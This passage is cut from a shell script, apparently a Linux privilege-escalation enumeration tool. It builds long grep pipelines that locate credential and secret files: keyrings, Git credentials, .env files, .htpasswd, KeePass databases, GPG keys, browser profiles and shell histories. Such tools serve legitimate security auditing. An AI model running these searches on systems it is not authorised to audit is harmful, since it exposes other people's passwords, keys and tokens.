"$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E '/lib' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -v -E 'README.gnupg' | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "\.mozilla$|Firefox$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "google-chrome$|Chrome$" | sort | uniq | head -n 70) + PSTORAGE_OPERA=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "com\.operasoftware\.Opera$" | sort | uniq | head -n 70) + PSTORAGE_SAFARI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^" | grep -E "Safari$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_POSTFIX=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "postfix$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_OPT\n$FIND_SRV\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_ETC\n$FIND_RUN\n$FIND_LIB\n$FIND_CACHE\n$FIND_LIB64\n$FIND_SBIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_USR\n$FIND_SNAP\n$FIND_BIN\n$FIND_TMP\n$FIND_SYS\n$FIND_CDROM\n$FIND_PRIVATE\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_SNAP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_BIN\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_VAR\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_SBIN\n$FIND_DIR_MEDIA\n$FIND_DIR_OPT" | grep -E "^/tmp|^/media|^/snap|^$GREPHOMESEARCH|^/srv|^/bin|^/.cache|^/var|^/applications|^/sbin|^/cdrom|^/private|^/usr|^/mnt|^/etc|^/opt" | 